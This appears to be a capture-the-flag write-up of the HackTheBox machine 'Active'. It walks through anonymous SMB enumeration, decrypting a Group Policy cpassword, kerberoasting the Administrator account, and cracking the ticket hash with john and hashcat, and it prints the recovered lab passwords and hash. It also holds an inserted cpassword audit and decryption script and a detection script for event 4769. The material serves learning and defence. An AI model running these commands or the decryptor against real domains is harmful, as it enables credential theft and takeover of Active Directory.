HTB: Active


Summary

Active was a fun machine whereby I grab a Groups.xml file from an SMB share that has anonymous read access. In the Groups.xml file is a cpassword which can be decrypted using a Python tool. After that I use those credentials to do kerberoasting for a service that is running as Administrator. With that I crack the hash and retrieve the password for the Administrator account. Then it's as simple as using wmiexec or psexec to get a shell on the machine.

Recon

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $nmap -A -oN nmap/initial.txt $ip 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 18:31 BST
Nmap scan report for 10.10.10.100
Host is up (0.033s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-03 17:31:28Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -3s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-03T17:32:25
|_  start_date: 2021-07-03T17:20:32

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.06 seconds

And an all-port scan:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active/nmap]
└──╼ $cat all-ports 
# Nmap 7.91 scan initiated Sat Jul  3 19:41:54 2021 as: nmap -p- -oN ../nmap/all-ports 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.038s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49171/tcp open  unknown
49182/tcp open  unknown

# Nmap done at Sat Jul  3 19:42:19 2021 -- 1 IP address (1 host up) scanned in 25.15 seconds

Enumeration of services

DNS Port 53

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $nslookup
> server 10.10.10.100
Default server: 10.10.10.100
Address: 10.10.10.100#53
> 10.10.10.100
** server can't find 100.10.10.10.in-addr.arpa: SERVFAIL
> 127.0.0.1
1.0.0.127.in-addr.arpa  name = localhost.
> active.htb
Server:         10.10.10.100
Address:        10.10.10.100#53

Name:   active.htb
Address: 10.10.10.100
> exit

Trying a DNS zone transfer (DNS was running on TCP, which may mean zone transfers are allowed) failed:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $dig axfr active.htb @$ip

; <<>> DiG 9.16.15-Debian <<>> axfr active.htb @10.10.10.100
;; global options: +cmd
; Transfer failed.

RPC Port 135

I couldn't get anything useful from RPC and just got permission denied:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $rpcclient -U '' -N $ip
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> 

Ldap Port 389

First I got the naming contexts of the machine using:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $ldapsearch -h $ip -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

However, I couldn't get any information from LDAP, meaning that this likely required credentials:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $ldapsearch -h $ip -x -b "DC=active,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1

SMB port 445

smbmap showed that I had read access to the Replication share:

└──╼ $smbclient -L //10.10.10.100/
Enter WORKGROUP\purplerabbit's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

Attempting to mount this share to my /mnt directory using:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $sudo mount -t cifs "//10.10.10.100/Replication" /mnt
[sudo] password for purplerabbit: 
Password for root@//10.10.10.100/Replication: 
mount error(13): Permission denied
Refer to the mount.cifs(8) manual page (e.g. man mount.cifs) and kernel log messages (dmesg)

This failed, but I was able to view the share using smbclient. From smbclient I saw that there were a lot of subdirectories, so to speed enumeration up I recursively downloaded all files like so:

└──╼ $smbclient //10.10.10.100/Replication                                                     
Enter WORKGROUP\purplerabbit's password: 
Anonymous login successful             
Try "help" to get a list of possible commands.                                                 
smb: \> mask ""             
recurse ON                                                                                     
prompt OFF
smb: \> mask ""                                                                                
smb: \> recurse ON
smb: \> prompt OFF                                                                             
smb: \> mget *                                                                                  
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.4 KiloBytes/sec) (average
 0.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.4 KiloBytes/sec) (average
 0.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (
2.1 KiloBytes/sec) (average 1.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol 
(23.5 KiloBytes/sec) (average 10.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHI
NE/Preferences/Groups/Groups.xml (10.6 KiloBytes/sec) (average 10.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB
984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (19.9 KiloBytes/sec) (average 11.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB
984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (34.9 KiloBytes/sec) (average 16.6 KiloBytes/sec)
smb: \> exit

I then ran a short find command in my directory to list all the files that were downloaded:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $find -type f
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
./active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
./active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
./nmap/initial.txt
./GPT.INI
./GPE.INI

SVC_TGS

I saw from the files that there was a Groups.xml file that had a cpassword inside:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Searching on Google for "groups.xml password decrypter" to see if there was any way to decrypt this password revealed that there was: this article https://www.andreafortuna.org/2019/02/13/abusing-group-policy-preference-files-for-password-discovery/ gave a Python script, which I cloned and tried for myself, and it gave me the password for the user:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $git clone  https://gist.github.com/andreafortuna/4d32100ae03abead52e8f3f61ab70385 
Cloning into '4d32100ae03abead52e8f3f61ab70385'...
remote: Enumerating objects: 3, done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 3
Receiving objects: 100% (3/3), done.

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $python3 GPPDecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $

Looking back over the Groups.xml file showed that this password was for the active.htb\SVC_TGS user.
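As an added defensive example (mine, not part of the original write-up or of the linked gist), here is a small stdlib audit script that walks a SYSVOL or Replication copy, flags every GPP XML file still carrying a cpassword, and sanity-checks the ciphertext length. The sample Groups.xml is a constructed copy of the one above; decryption with the key Microsoft published only runs if the `cryptography` package happens to be installed.

```python
"""Audit a SYSVOL-style tree for Group Policy Preference XML files that still
carry a cpassword attribute (the MS14-025 weakness this box exploits).
Stdlib only; decryption is attempted only if `cryptography` is installed."""
import base64
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files whose schema allowed an embedded cpassword.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# AES-256 key Microsoft published in the GPP protocol spec (MS-GPPREF 2.2.1.1.4).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")

# Constructed copy of the Groups.xml recovered from the Replication share above.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>
"""

def cpassword_bytes(cpassword: str) -> bytes:
    """GPP strips base64 padding; restore it and check AES-CBC block alignment."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if len(raw) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    return raw

def try_decrypt(cpassword: str):
    """AES-256-CBC, zero IV, UTF-16LE plaintext; returns None without `cryptography`."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(bytes(16))).decryptor()
    plain = dec.update(cpassword_bytes(cpassword)) + dec.finalize()
    return plain[:-plain[-1]].decode("utf-16-le")   # drop PKCS#7 padding

def scan_file(path: Path) -> list:
    """One finding per element in `path` that carries a cpassword attribute."""
    m = GUID_RE.search(str(path))
    gpo = m.group(0) if m else "?"
    findings = []
    for elem in ET.parse(path).iter():
        a = elem.attrib
        if "cpassword" not in a:
            continue
        findings.append({
            "file": path.name, "gpo": gpo, "action": a.get("action", "?"),
            # the account attribute differs per preference type
            "account": a.get("userName") or a.get("accountName") or a.get("runAs", "?"),
            "ciphertext_len": len(cpassword_bytes(a["cpassword"])),
            "cpassword": a["cpassword"],
        })
    return findings

def scan_tree(root: Path) -> list:
    """Walk a SYSVOL / Replication copy and collect every cpassword finding."""
    return [f for p in root.rglob("*") if p.name in GPP_FILES for f in scan_file(p)]

def demo() -> list:
    """Build the page's Policies/{GUID}/.../Groups.xml layout in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp = (Path(tmp) / "Policies" / "{31B2F340-016D-11D2-945F-00C04FB984F9}"
               / "MACHINE" / "Preferences" / "Groups")
        gpp.mkdir(parents=True)
        (gpp / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
        return scan_tree(Path(tmp))

if __name__ == "__main__":
    for f in demo():
        print(f"{f['gpo']} {f['file']}: cpassword for {f['account']} "
              f"({f['ciphertext_len']} bytes of ciphertext)")
```

Point `scan_tree` at a mounted SYSVOL (or the downloaded Replication tree) to list every GPO that still ships a cpassword; the 64-byte ciphertext is four AES blocks, exactly what a 26-character UTF-16LE password pads to.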

Next I checked whether these credentials gave access to any new shares on SMB, which showed that we did indeed have access to extra shares:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

I was then able to get access to user.txt:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $smbclient -U SVC_TGS //10.10.10.100/Users
Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 15:39:20 2018
  ..                                 DR        0  Sat Jul 21 15:39:20 2018
  Administrator                       D        0  Mon Jul 16 11:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 06:06:44 2009
  Default                           DHR        0  Tue Jul 14 07:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 06:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 05:57:55 2009
  Public                             DR        0  Tue Jul 14 05:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 16:16:32 2018

                10459647 blocks of size 4096. 5728686 blocks available
smb: \> cd Administrator
smb: \Administrator\> dir
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\> cd ..
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
  .                                   D        0  Sat Jul 21 16:16:32 2018
  ..                                  D        0  Sat Jul 21 16:16:32 2018
  Contacts                            D        0  Sat Jul 21 16:14:11 2018
  Desktop                             D        0  Sat Jul 21 16:14:42 2018
  Downloads                           D        0  Sat Jul 21 16:14:23 2018
  Favorites                           D        0  Sat Jul 21 16:14:44 2018
  Links                               D        0  Sat Jul 21 16:14:57 2018
  My Documents                        D        0  Sat Jul 21 16:15:03 2018
  My Music                            D        0  Sat Jul 21 16:15:32 2018
  My Pictures                         D        0  Sat Jul 21 16:15:43 2018
  My Videos                           D        0  Sat Jul 21 16:15:53 2018
  Saved Games                         D        0  Sat Jul 21 16:16:12 2018
  Searches                            D        0  Sat Jul 21 16:16:24 2018

                10459647 blocks of size 4096. 5728686 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
  .                                   D        0  Sat Jul 21 16:14:42 2018
  ..                                  D        0  Sat Jul 21 16:14:42 2018
  user.txt                            A       34  Sat Jul 21 16:06:25 2018

                10459647 blocks of size 4096. 5728686 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> 

There wasn't much else of interest in the other shares. Note that I couldn't use psexec or wmiexec to get a shell on the box because I didn't have any write permissions to the SMB shares.

Attempting to connect via WinRM didn't work:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $evil-winrm -i $ip -u SVC_TGS -p GPPstillStandingStrong2k18

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.100" port 5985 (10.10.10.100:5985)

Error: Exiting with code 1

Trying to enumerate LDAP now that we had a user also proved useless:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active/4d32100ae03abead52e8f3f61ab70385]
└──╼ $ldapsearch -h $ip -x -D active.htb\SVC_TGS -w 'GPPstillStandingStrong2k18' -b "DC=active,DC=htb" 
ldap_bind: Invalid credentials (49)
        additional info: 80090308: LdapErr: DSID-0C090400, comment: AcceptSecurityContext error, data 52e, v1db1

└──╼ $./windapsearch-linux-amd64  --domain active.htb -u active.htb\SVC_TGS -p GPPstillStandingStrong2k18 -m users
FATAL[2021-07-03T21:35:11+01:00] invalid Credentials

SVC_TGS => Administrator

So next there was Kerberos, which I hadn't enumerated yet; for this machine I guess you just need to know that kerberoasting is a thing in order to complete it.

A quick summary of kerberoasting: it is an attack on a service account whereby a user requests a service ticket, and part of that ticket is encrypted with the password hash of the service account and held in memory, where it's supposed to be sent on to the resource. However, it is possible to take that ticket from memory and attempt to crack it offline, thereby retrieving the password for the service account.

The interesting thing about kerberoasting is that there is no patch, as it's a weakness inherent in the architecture of Kerberos, so the only defense is to give service accounts really strong passwords that are changed every so often.
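As an added example (mine, not the author's), the detection-side counterpart: the RC4 (etype 23) service-ticket request made below is logged on the domain controller as Security event 4769, and RC4 tickets for user-account SPNs stand out in a domain that otherwise negotiates AES. The script below parses constructed 4769 events flattened to key=value lines (field names assumed to follow the Windows event schema) and flags both single RC4 user-SPN requests and accounts requesting several of them in bulk.

```python
"""Triage Windows Security event 4769 (Kerberos service ticket requested) for
kerberoasting: RC4 (etype 0x17) tickets for user-account SPNs, and accounts
that request several of them in bulk.  Stdlib only; events are constructed."""
import re
from collections import defaultdict

RC4_HMAC = "0x17"        # etype 23, the type of the ticket cracked in this write-up
TGT_SERVICE = "krbtgt"   # 4769 for krbtgt is a TGT renewal, not a service ticket
BULK_THRESHOLD = 3       # distinct user SPNs from one account before we call it bulk

# Constructed events: 4769 EventData fields flattened to key=value, one per line.
# Assumed field names follow the Windows event schema (TargetUserName, ServiceName,
# TicketEncryptionType, IpAddress, Status); the client hosts and names are made up.
SAMPLE_4769 = [
    "2021-07-04T05:09:58Z EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x12 IpAddress=10.10.14.7 Status=0x0",
    "2021-07-04T05:10:01Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0",
    "2021-07-04T05:10:01Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0",
    "2021-07-04T05:10:02Z EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x17 IpAddress=10.10.10.100 Status=0x0",
    "2021-07-04T05:12:10Z EventID=4769 TargetUserName=bob@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.14.9 Status=0x0",
    "2021-07-04T05:12:10Z EventID=4769 TargetUserName=bob@ACTIVE.HTB ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.14.9 Status=0x0",
    "2021-07-04T05:12:11Z EventID=4769 TargetUserName=bob@ACTIVE.HTB ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.14.9 Status=0x0",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line: str) -> dict:
    """Split 'timestamp key=value ...' into a dict; unknown keys are kept as-is."""
    ts, _, rest = line.partition(" ")
    ev = dict(FIELD_RE.findall(rest))
    ev["Timestamp"] = ts
    return ev

def is_user_spn_rc4(ev: dict) -> bool:
    """True for a successful 4769 that asked for an RC4 ticket to a user (non-computer) SPN.

    Caveat: an account whose msDS-SupportedEncryptionTypes allows only RC4 will
    legitimately produce these, so treat a hit as a triage signal, not proof."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and svc.lower() != TGT_SERVICE
            and not svc.endswith("$"))

def find_roasting(lines):
    """Return (single hits, bulk requesters) for a batch of 4769 lines."""
    per_account = defaultdict(set)
    hits = []
    for ev in map(parse_event, lines):
        if is_user_spn_rc4(ev):
            hits.append((ev["TargetUserName"], ev["ServiceName"], ev["IpAddress"]))
            per_account[ev["TargetUserName"]].add(ev["ServiceName"])
    bulk = {acct: sorted(spns) for acct, spns in per_account.items()
            if len(spns) >= BULK_THRESHOLD}
    return hits, bulk

if __name__ == "__main__":
    hits, bulk = find_roasting(SAMPLE_4769)
    for who, spn, ip in hits:
        print(f"RC4 service ticket for {spn} requested by {who} from {ip}")
    for who, spns in bulk.items():
        print(f"bulk request from {who}: {', '.join(spns)}")
```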

Impacket's GetUserSPNs.py retrieves the service principal names (SPNs) set on user accounts and can also request a service ticket for each of them:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $GetUserSPNs.py -t active.htb -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -o test.hash
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2021-01-21 16:07:03.723783

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $cat test.hash 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9756ae7f5c80fbbfd1bd173df40df15$...

From this output we see that there is an SPN, active/CIFS:445, registered on the Administrator account, and we get the service-ticket hash for that Administrator user. We can now attempt to crack this hash using hashcat or John:

┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $john test.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:07 DONE (2021-07-04 05:11) 0.1416g/s 1492Kp/s 1492Kc/s 1492KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]
└──╼ $john test.hash --show
?:Ticketmaster1968

1 password hash cracked, 0 left
┌─[purplerabbit@kali]─[~/Documents/htb/ad/active]

Cracking with hashcat:

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/active]                                                                                                                                                
└──╼ $hashcat -m 13100 test.hash /usr/share/wordlists/rockyou.txt                               
hashcat (v6.1.1) starting...
                                               
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz, 3300/3364 MB (1024 MB allocatable), 4MCU
                                                                                               
Minimum password length supported by kernel: 0                                                 
Maximum password length supported by kernel: 256
                                                                                               
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1                             
                                               
Applicable optimizers applied:                                                                 
* Zero-Byte                              
* Not-Iterated
* Single-Hash                    
* Single-Salt                    
                                               
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.                                                                                                            
See the above message to find out about the exact limits.
                                                                                               
Watchdog: Hardware monitoring interface not found on your system.                                                                                                                             
Watchdog: Temperature abort trigger disabled.                                                                                                                           
Host memory required for this attack: 134 MB                                                                     
                             
Dictionary cache hit:                                                                          
* Filename..: /usr/share/wordlists/rockyou.txt                                                                                                                                                
* Passwords.: 14344385                                                                         
* Bytes.....: 139921507                                                                        
* Keyspace..: 14344385               

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9756ae7f5c80fbbfd1bd173df40df15$ea269720f599c1b65bc59e235ad4c251b301498c48de14fcb5b28753c683a2815fb7d0928e9f84ec809d74186ca6b
955c784ad0b20020e7c6b2141e3f65acfff1f3cff31ff5aa91e2125aa39eb60d525257b2b70ab695c9c6cfd97b56b13ee2f45f7ffa5cd966a69b086315089446b77239989edc233b1e9c7886110173eb219f93d2ee509b04b1ee8053048cc6
fb5fbab1098055860b597c5b0494032dc046c736d965551bfe839fa699433ca8169bde8ba34a8eca52ec1d907c51fbda45629663cc06c5db618eb05608786807893deec1f5db9dfa382551a8e433fef2ece20f069a18ce39027d99bfc87909
04669da7693259546b2b7910b43bf74be341cf97b2d447a2097699c92f3858dd5589a29870abecb19c7d08526cecc1e3278892e42efae04856bfc406bc9d6c211f7bc52c5617aa7be122aec602dc0633f150eb811f4f3a61f45b4469b2e871
1abdc2d47d6b58088d25c8b5ba8de1c750fcb5ff7db49f023e9027e48a65d1cad298d880c51b012f0a9b613000f3a9a86bc8e5a7577c52b9a24c016a02b54c474d62e114b5661bb36479de7b6029ab1cea9f3c4844641fb624f886e4a07641
